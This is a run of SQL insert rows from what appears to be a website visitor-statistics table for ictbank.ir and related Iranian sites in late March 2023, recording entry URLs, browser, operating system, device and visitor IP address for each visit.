(30487,'2023-03-25','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(30488,'2023-03-25','https://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','15.204.182.106','000',0,3,0),
(30489,'2023-03-25','https://neginghavami.ir','Opera','Windows','12.0','desktop','Unknown','','83.166.247.13','000',0,1,0),
(30490,'2023-03-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(30491,'2023-03-25','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','94.158.245.23','000',0,1,0),
(30492,'2023-03-25','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','185.142.236.43','000',0,3,0),
(30493,'2023-03-25','https://ictbank.ir/blog','Firefox','Ubuntu','107.0','desktop','Unknown','','139.91.70.45','000',0,2,0),
(30494,'2023-03-25','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','49.51.195.144','000',0,1,0),
(30495,'2023-03-25','https://ictbank.ir/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','52.51.218.89','000',0,1,0),
(30496,'2023-03-25','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','108.179.251.69','000',0,1,0),
(30497,'2023-03-25','https://ictbank.ir/blog','Chrome','Windows','57.0.0.0','desktop','Unknown','','3.83.255.185','000',0,2,0),
(30498,'2023-03-25','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','18.204.245.8','000',0,1,0),
(30499,'2023-03-25','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.216.141.161','000',0,1,0),
(30500,'2023-03-25','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(30501,'2023-03-25','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.13.247','000',0,3,0),
(30502,'2023-03-25','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','93.158.90.155','000',0,2,0),
(30503,'2023-03-25','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Unknown','','49.235.69.143','000',0,1,0),
(30504,'2023-03-25','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','93.158.90.169','000',0,1,0),
(30505,'2023-03-25','https://ictbank.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','93.158.90.137','000',0,1,0),
(30506,'2023-03-25','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','198.20.69.98','000',0,3,0),
(30507,'2023-03-25','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','111.90.158.200','000',0,6,0),
(30508,'2023-03-25','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','67.0.0.0','desktop','Unknown','','185.119.81.102','000',0,6,0),
(30509,'2023-03-25','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','162.241.152.79','000',0,1,0),
(30510,'2023-03-25','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.186.162.44','000',0,1,0),
(30511,'2023-03-25','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','91.92.122.6','000',0,1,0),
(30512,'2023-03-25','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(30513,'2023-03-25','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','190.107.177.243','000',0,1,0),
(30514,'2023-03-25','https://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','78.46.103.131','000',0,1,0),
(30515,'2023-03-25','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(30516,'2023-03-25','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.114.130.26','000',0,1,0),
(30517,'2023-03-25','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','97.74.88.138','000',0,2,0),
(30518,'2023-03-26','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(30519,'2023-03-26','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,2,0),
(30520,'2023-03-26','https://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','152.89.196.13','000',0,1,0),
(30521,'2023-03-26','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(30522,'2023-03-26','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(30523,'2023-03-26','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(30524,'2023-03-26','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.106','000',0,1,0),
(30525,'2023-03-26','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.136','000',0,1,0),
(30526,'2023-03-26','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(30527,'2023-03-26','https://ictbank.ir/blog','Firefox','Unknown','35.0','desktop','Unknown','','111.207.155.211','000',0,1,0),
(30528,'2023-03-26','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(30529,'2023-03-26','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','104.225.142.60','000',0,1,0),
(30530,'2023-03-26','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','54.217.83.13','000',0,1,0),
(30531,'2023-03-26','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.134.46.76','000',0,1,0),
(30532,'2023-03-26','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.240.99.104','000',0,1,0),
(30533,'2023-03-26','https://l.instagram.com/','Instagram','Android','274.0.0.0.0','mobile:smart','Redmi Note 9S','','5.75.193.52','000',0,1,0),
(30534,'2023-03-26','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.7','000',0,3,0),
(30535,'2023-03-26','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','51.142.88.19','000',0,1,0),
(30536,'2023-03-26','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(30537,'2023-03-26','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Galaxy S20 FE','','93.158.91.231','000',0,1,0),
(30538,'2023-03-26','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Galaxy S20 FE','','93.158.91.232','000',0,1,0),
(30539,'2023-03-26','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Galaxy S20 FE','','93.158.91.229','000',0,1,0),
(30540,'2023-03-26','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Galaxy S20 FE','','93.158.91.233','000',0,1,0),
(30541,'2023-03-26','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.245.199.62','000',0,1,0),
(30542,'2023-03-26','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','184.168.112.170','000',0,1,0),
(30543,'2023-03-26','https://ictbank.ir/blog','Chrome','Windows','59.0.0.0','desktop','Unknown','','176.9.47.58','000',0,1,0),
(30544,'2023-03-26','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(30545,'2023-03-26','https://ictbank.ir/blog','Firefox','Windows','5.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(30546,'2023-03-26','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','134.209.96.22','000',0,1,0),
(30547,'2023-03-26','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.91.44.156','000',0,1,0),
(30548,'2023-03-26','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','89.187.163.196','000',0,3,0),
(30549,'2023-03-26','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','23.90.160.138','000',0,1,0),
(30550,'2023-03-26','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','70.0.0.0','desktop','Unknown','','185.119.81.102','000',0,2,0),
(30551,'2023-03-26','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(30552,'2023-03-26','https://ictbank.ir/blog','Chrome','Windows','106.0.0','desktop','Unknown','','103.218.243.201','000',0,17,0),
(30553,'2023-03-26','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.92.27.198','000',0,1,0),
(30554,'2023-03-26','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','3.238.67.104','000',0,1,0),
(30555,'2023-03-26','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','80.82.77.139','000',0,3,0),
(30556,'2023-03-27','https://ictbank.ir/blog','Firefox','Windows','117.0','desktop','Unknown','','195.146.37.212','000',0,1,0),
(30557,'2023-03-27','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(30558,'2023-03-27','https://ictbank.ir/blog','Chrome','Windows','50.0.0.0','desktop','Unknown','','3.83.114.152','000',0,1,0),
(30559,'2023-03-27','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.121','000',0,3,0),
(30560,'2023-03-27','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,1,0),
(30561,'2023-03-27','https://ictbank.ir/blog','Chrome','OS X','11.0.0.0','desktop','Macintosh','','208.80.194.122','000',0,4,0),
(30562,'2023-03-27','https://ictbank.ir/blog','Chrome','Windows','89.0.0.0','desktop','Unknown','','147.78.47.230','000',0,2,0),
(30563,'2023-03-27','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.254.250.188','000',0,1,0),
(30564,'2023-03-27','https://ictbank.ir','Chrome','Windows','62.0.0.0','desktop','Unknown','','23.94.62.170','000',0,1,0),
(30565,'2023-03-27','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','20.127.152.218','000',0,2,0),
(30566,'2023-03-27','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','52.36.190.74','000',0,1,0),
(30567,'2023-03-27','https://ictbank.ir/blog','Chrome','Android','80.0.0.0','mobile:smart','Galaxy S20','','149.56.150.99','000',0,1,0),
(30568,'2023-03-27','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(30569,'2023-03-27','https://nikoo-academy.com/masoudnikoofar','Chrome','Android','109.0.0.0','mobile:smart','Galaxy A42 5G','','2.147.10.198','000',0,8,0),
(30570,'2023-03-27','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(30571,'2023-03-27','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','51.178.99.101','000',0,1,0),
(30572,'2023-03-27','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','211.63.71.72','000',0,2,0),
(30573,'2023-03-27','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,8,0),
(30574,'2023-03-27','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.213.220.178','000',0,2,0),
(30575,'2023-03-27','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','61.12.67.132','000',0,1,0),
(30576,'2023-03-27','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','128.14.224.132','000',0,3,0),
(30577,'2023-03-27','https://ns1.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.250','000',0,2,0),
(30578,'2023-03-27','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','45.76.181.146','000',0,1,0),
(30579,'2023-03-27','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','192.95.24.32','000',0,2,0),
(30580,'2023-03-27','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','62.210.115.126','000',0,1,0),
(30581,'2023-03-27','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','159.223.112.201','000',0,3,0),
(30582,'2023-03-27','https://ictbank.ir/blog','Chrome','Windows','83.0.0.0','desktop','Unknown','','143.42.49.130','000',0,2,0),
(30583,'2023-03-27','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','195.177.216.121','000',0,1,0),
(30584,'2023-03-27','https://ictbank.ir/blog','Chrome','iOS','87.0.0.0','tablet','iPad','','92.241.99.153','000',0,1,0),
(30585,'2023-03-27','https://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','152.89.196.13','000',0,1,0),
(30586,'2023-03-27','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.11','000',0,2,0),
(30587,'2023-03-27','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','79.0.0.0','desktop','Unknown','','185.119.81.106','000',0,2,0),
(30588,'2023-03-28','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.46','000',0,4,0),
(30589,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','45.158.49.169','000',0,4,0),
(30590,'2023-03-28','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,2,0),
(30591,'2023-03-28','https://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.12','000',0,2,0),
(30592,'2023-03-28','https://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','176.58.108.246','000',0,1,0),
(30593,'2023-03-28','https://ictbank.ir/blog','Edge','Windows','.0','desktop','Unknown','','5.188.86.230','000',0,1,0),
(30594,'2023-03-28','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','39.0.0.0','desktop','Unknown','','185.119.81.106','000',0,8,0),
(30595,'2023-03-28','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(30596,'2023-03-28','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.8','000',0,2,0),
(30597,'2023-03-28','http://ictbank.ir','Firefox Focus','Android','1.0','mobile:smart','Unknown','','107.178.232.224','000',0,2,0),
(30598,'2023-03-28','http://ictbank.ir','Safari','OS X','15.0','desktop','Macintosh','','107.178.200.194','000',0,2,0),
(30599,'2023-03-28','https://ictbank.ir/blog/','Internet Explorer','Windows','10.0','desktop','Unknown','','192.42.116.193','000',0,2,0),
(30600,'2023-03-28','http://ictbank.ir','Firefox Focus','Android','1.0','mobile:smart','Unknown','','107.178.231.244','000',0,2,0),
(30601,'2023-03-28','http://ictbank.ir','Chrome','Linux','101.0.0.0','desktop','Unknown','','107.178.200.236','000',0,2,0),
(30602,'2023-03-28','https://ictbank.ir/blog','Edge','Windows','96.0.0.0','desktop','Unknown','','54.200.195.213','000',0,2,0),
(30603,'2023-03-28','https://ictbank.ir/blog','Edge','Windows','96.0.0.0','desktop','Unknown','','54.68.244.63','000',0,2,0),
(30604,'2023-03-28','https://ictbank.ir/blog','Edge','Windows','96.0.0.0','desktop','Unknown','','18.220.115.84','000',0,5,0),
(30605,'2023-03-28','https://ictbank.ir/blog','Edge','Windows','96.0.0.0','desktop','Unknown','','18.223.211.188','000',0,2,0),
(30606,'2023-03-28','http://ictbank.ir','Edge','Windows','96.0.0.0','desktop','Unknown','','107.178.232.163','000',0,2,0),
(30607,'2023-03-28','https://ictbank.ir/blog/','Internet Explorer','Windows','10.0','desktop','Unknown','','89.58.30.164','000',0,1,0),
(30608,'2023-03-28','http://ictbank.ir','Chrome','Linux','101.0.0.0','desktop','Unknown','','35.203.245.216','000',0,2,0),
(30609,'2023-03-28','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','47.106.201.134','000',0,1,0),
(30610,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','63.0.0.0','desktop','Unknown','','173.249.2.213','000',0,1,0),
(30611,'2023-03-28','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,6,0),
(30612,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','97.0.0.0','desktop','Unknown','','45.9.148.209','000',0,1,0),
(30613,'2023-03-28','https://ictbank.ir/blog/','Internet Explorer','Windows','11.0','desktop','Unknown','','18.130.225.44','000',0,1,0),
(30614,'2023-03-28','https://ictbank.ir/blog/','Chrome','Android','105.0.0.0','mobile:smart','Unknown','','104.129.56.91','000',0,1,0),
(30615,'2023-03-28','https://ictbank.ir/blog/','Chrome','Android','105.0.0.0','mobile:smart','Unknown','','218.232.76.138','000',0,1,0),
(30616,'2023-03-28','https://ictbank.ir/blog/','Firefox Mobile','Android','111.0','mobile:smart','Unknown','','165.231.253.246','000',0,2,0),
(30617,'2023-03-28','https://ictbank.ir/blog/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','206.189.247.132','000',0,1,0),
(30618,'2023-03-28','https://ictbank.ir/blog/','Firefox Mobile','Android','111.0','mobile:smart','Unknown','','195.54.178.33','000',0,1,0),
(30619,'2023-03-28','https://ictbank.ir/blog/','Chrome','Android','105.0.0.0','mobile:smart','Unknown','','167.88.60.235','000',0,1,0),
(30620,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','35.165.232.172','000',0,1,0),
(30621,'2023-03-28','https://ictbank.ir/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','95.25.71.28','000',0,4,0),
(30622,'2023-03-28','https://ictbank.ir/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','194.186.142.118','000',0,1,0),
(30623,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','139.99.115.8','000',0,1,0),
(30624,'2023-03-28','https://ictbank.ir/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','89.208.29.119','000',0,1,0),
(30625,'2023-03-28','https://ictbank.ir/blog','Chromium','Ubuntu','68.0.0.0','desktop','Unknown','','121.46.142.244','000',0,6,0),
(30626,'2023-03-28','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.122','000',0,4,0),
(30627,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','147.135.244.204','000',0,1,0),
(30628,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','5.188.62.21','000',0,3,0),
(30629,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','195.88.253.86','000',0,4,0),
(30630,'2023-03-28','https://ictbank.ir/blog','Chrome','iOS','99.0.0.0','mobile:smart','iPhone','','168.151.102.77','000',0,1,0),
(30631,'2023-03-28','https://ictbank.ir/blog','Chrome','iOS','99.0.0.0','mobile:smart','iPhone','','185.229.250.72','000',0,1,0),
(30632,'2023-03-28','https://ictbank.ir/blog','Chrome','iOS','99.0.0.0','mobile:smart','iPhone','','213.188.80.108','000',0,1,0),
(30633,'2023-03-28','https://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','193.128.114.38','000',0,2,0),
(30634,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','77.0.0.0','desktop','Unknown','','52.17.54.30','000',0,5,0),
(30635,'2023-03-28','https://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(30636,'2023-03-28','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.242','000',0,10,0),
(30637,'2023-03-28','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.110.118.172','000',0,1,0),
(30638,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','31.204.153.115','000',0,1,0),
(30639,'2023-03-28','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(30640,'2023-03-28','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.240.99.104','000',0,1,0),
(30641,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.219.255.39','000',0,1,0),
(30642,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','65.109.164.21','000',0,2,0),
(30643,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,1,0),
(30644,'2023-03-28','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(30645,'2023-03-28','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.117.129.228','000',0,1,0),
(30646,'2023-03-28','https://ictbank.ir/blog','Opera','Windows','11.0','desktop','Unknown','','52.58.12.201','000',0,3,0),
(30647,'2023-03-28','https://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','115.37.107.192','000',0,1,0),
(30648,'2023-03-28','https://ictbank.ir/blog','Chrome','Linux','108.0.0.0','desktop','Unknown','','44.227.127.2','000',0,1,0),
(30649,'2023-03-28','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.51','000',0,1,0),
(30650,'2023-03-28','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.82','000',0,1,0),
(30651,'2023-03-28','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.79','000',0,1,0),
(30652,'2023-03-28','https://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','130.255.166.121','000',0,1,0),
(30653,'2023-03-28','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','37.230.116.195','000',0,1,0),
(30654,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.201.194.12','000',0,1,0),
(30655,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','97.0.0.0','desktop','Unknown','','107.172.171.75','000',0,1,0),
(30656,'2023-03-28','https://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','216.163.176.191','000',0,6,0),
(30657,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,1,0),
(30658,'2023-03-28','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','169.197.113.239','000',0,3,0),
(30659,'2023-03-28','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','95.211.87.209','000',0,1,0),
(30660,'2023-03-28','https://45.92.94.221:443/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','3.236.4.230','000',0,6,0),
(30661,'2023-03-28','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.242.5.52','000',0,1,0),
(30662,'2023-03-28','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.205.16.63','000',0,1,0),
(30663,'2023-03-28','https://mail.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.141.42','000',0,1,0),
(30664,'2023-03-28','http://neginghavami.ir','Safari','OS X','15.0','desktop','Macintosh','','35.203.255.115','000',0,4,0),
(30665,'2023-03-28','http://neginghavami.ir','Firefox Focus','Android','1.0','mobile:smart','Unknown','','107.178.238.52','000',0,6,0),
(30666,'2023-03-28','https://ictbank.ir/blog','Edge','Windows','96.0.0.0','desktop','Unknown','','18.216.1.210','000',0,2,0),
(30667,'2023-03-28','https://ictbank.ir/blog','Edge','Windows','96.0.0.0','desktop','Unknown','','18.188.41.199','000',0,3,0),
(30668,'2023-03-28','https://ictbank.ir/blog','Edge','Windows','96.0.0.0','desktop','Unknown','','54.244.202.183','000',0,3,0),
(30669,'2023-03-28','https://ictbank.ir/blog','Edge','Windows','96.0.0.0','desktop','Unknown','','34.210.212.107','000',0,2,0),
(30670,'2023-03-28','http://neginghavami.ir','Chrome','OS X','101.0.0.0','desktop','Macintosh','','35.203.245.208','000',0,2,0),
(30671,'2023-03-28','https://ictbank.ir/blog/','Internet Explorer','Windows','10.0','desktop','Unknown','','45.154.98.225','000',0,1,0),
(30672,'2023-03-28','https://neginghavami.ir/blog/','Internet Explorer','Windows','10.0','desktop','Unknown','','185.243.218.110','000',0,1,0),
(30673,'2023-03-28','https://ictbank.ir/blog/','Internet Explorer','Windows','10.0','desktop','Unknown','','185.220.100.244','000',0,1,0),
(30674,'2023-03-28','http://neginghavami.ir','Chrome','Linux','101.0.0.0','desktop','Unknown','','35.203.245.113','000',0,4,0),
(30675,'2023-03-28','http://ictbank.ir','Chrome','OS X','101.0.0.0','desktop','Macintosh','','107.178.232.248','000',0,2,0),
(30676,'2023-03-28','http://neginghavami.ir','Firefox Focus','Android','1.0','mobile:smart','Unknown','','107.178.239.216','000',0,4,0),
(30677,'2023-03-28','https://ictbank.ir/blog/','Internet Explorer','Windows','10.0','desktop','Unknown','','45.61.184.227','000',0,1,0),
(30678,'2023-03-28','https://neginghavami.ir/blog/','Internet Explorer','Windows','10.0','desktop','Unknown','','185.220.101.77','000',0,1,0),
(30679,'2023-03-28','https://neginghavami.ir/blog/','Internet Explorer','Windows','10.0','desktop','Unknown','','192.42.116.25','000',0,1,0),
(30680,'2023-03-28','https://ictbank.ir/blog','Edge','Windows','96.0.0.0','desktop','Unknown','','3.143.22.24','000',0,6,0),
(30681,'2023-03-28','https://ictbank.ir/blog/','Internet Explorer','Windows','10.0','desktop','Unknown','','185.220.101.72','000',0,1,0),
(30682,'2023-03-28','https://ictbank.ir/blog/','Internet Explorer','Windows','10.0','desktop','Unknown','','198.98.48.20','000',0,1,0),
(30683,'2023-03-28','http://ictbank.ir','Chrome','Linux','101.0.0.0','desktop','Unknown','','107.178.200.215','000',0,2,0),
(30684,'2023-03-28','http://neginghavami.ir','Safari','OS X','15.0','desktop','Macintosh','','107.178.200.204','000',0,4,0),
(30685,'2023-03-28','http://neginghavami.ir','Chrome','Android','101.0.0.0','mobile:smart','Pixel 4','','107.178.232.162','000',0,4,0),
(30686,'2023-03-28','https://ictbank.ir/blog','Edge','Windows','96.0.0.0','desktop','Unknown','','3.12.83.15','000',0,5,0),
(30687,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','97.0.0.0','desktop','Unknown','','45.66.35.10','000',0,1,0),
(30688,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','97.0.0.0','desktop','Unknown','','190.2.143.176','000',0,1,0),
(30689,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.3','000',0,1,0),
(30690,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','97.0.0.0','desktop','Unknown','','192.42.116.204','000',0,1,0),
(30691,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','97.0.0.0','desktop','Unknown','','94.177.9.131','000',0,1,0),
(30692,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','95.0.0.0','desktop','Unknown','','54.75.37.6','000',0,2,0),
(30693,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','95.0.0.0','desktop','Unknown','','63.33.59.190','000',0,3,0),
(30694,'2023-03-28','https://ictbank.ir/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','89.208.29.120','000',0,1,0),
(30695,'2023-03-28','https://ictbank.ir/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','194.186.142.176','000',0,4,0),
(30696,'2023-03-28','https://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','164.92.212.136','000',0,19,0),
(30697,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','138.128.136.168','000',0,1,0),
(30698,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','167.71.235.30','000',0,2,0),
(30699,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','98.0.0.0','desktop','Unknown','','213.33.190.170','000',0,7,0),
(30700,'2023-03-28','https://ictbank.ir/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','164.90.241.135','000',0,1,0),
(30701,'2023-03-28','https://ictbank.ir/blog','Firefox Mobile','Android','111.0','mobile:smart','Unknown','','84.252.95.140','000',0,1,0),
(30702,'2023-03-28','https://ictbank.ir/blog','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','68.183.245.101','000',0,2,0),
(30703,'2023-03-28','https://ictbank.ir/blog','Chrome','OS X','110.0.0.0','desktop','Macintosh','','35.89.201.222','000',0,2,0),
(30704,'2023-03-28','https://neginghavami.ir/blog/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','82.135.80.15','000',0,1,0),
(30705,'2023-03-28','https://neginghavami.ir/blog/','Firefox','Windows','111.0','desktop','Unknown','','24.199.69.21','000',0,1,0),
